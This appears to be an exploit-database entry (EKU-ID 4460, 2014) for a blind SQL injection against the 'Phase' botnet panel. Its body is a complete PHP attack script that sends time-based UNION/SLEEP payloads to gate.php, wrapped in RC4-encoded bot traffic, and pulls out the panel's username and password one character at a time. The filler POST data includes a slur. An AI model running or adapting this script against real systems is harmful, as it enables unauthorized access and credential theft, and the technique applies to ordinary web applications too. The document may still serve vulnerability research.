Phase botnet blind SQL injection vulnerability
| EKU-ID: 4460 | CVE: | OSVDB-ID: |
| Author: Xylitol | Published: 2014-12-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4460 | CVE: | OSVDB-ID: |
| Author: Xylitol | Published: 2014-12-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
<?php // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2 // Start with PHP CLI (php pwn.php) set_time_limit(0); // Adjust this :) define('SLEEP_TIME', '4'); define('PAGE_TIME', 4); echo('attacking ' . URL . PHP_EOL); get_string('username'); get_string('password'); function get_length($field) { $length = 1; while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) { ++$length; } echo($field . ' length: ' . $length . PHP_EOL); return $length; } function get_string($field) { $length = get_length($field); $str = ''; for ($i = 0; $i < $length; ++$i) { $str .= chr(get_char($field, $i)); echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL); } return $str; } function get_char($field, $id) { $binary = ''; for ($i = 1; $i < 256; $i *= 2) { if ($i == 128) $binary = '0' . $binary; else $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary; } return bindec($binary); } function is_true($query) { $rc4_key = 'aaaa'; // b d u $data = 'u=tapz&d=faggot&b=lol'; $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key)); $encode = $rc4_key . $encode; $injection = urlencode($query); $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode); return !($req['time'] < PAGE_TIME); } function post_request($url, $data) { $handle = curl_init($url); curl_setopt($handle, CURLOPT_HEADER, false); curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); curl_setopt($handle, CURLOPT_POST, true); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_TIMEOUT, 30); $time = microtime(true); $page = curl_exec($handle); $time = microtime(true) - $time; curl_close($handle); return array( 'page' => $page, 'time' => $time ); } function rc4($pwd, $data, $data_length, $pwd_length){ $key[] = ''; $box[] = ''; $cipher = ''; for ($i = 0; $i < 256; $i++) { $key[$i] = ord($pwd[$i % $pwd_length]); $box[$i] = $i; } for ($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $key[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for ($a = $j = $i = 0; $i < $data_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $k = $box[(($box[$a] + $box[$j]) % 256)]; $cipher .= chr(ord($data[$i]) ^ $k); } return $cipher; }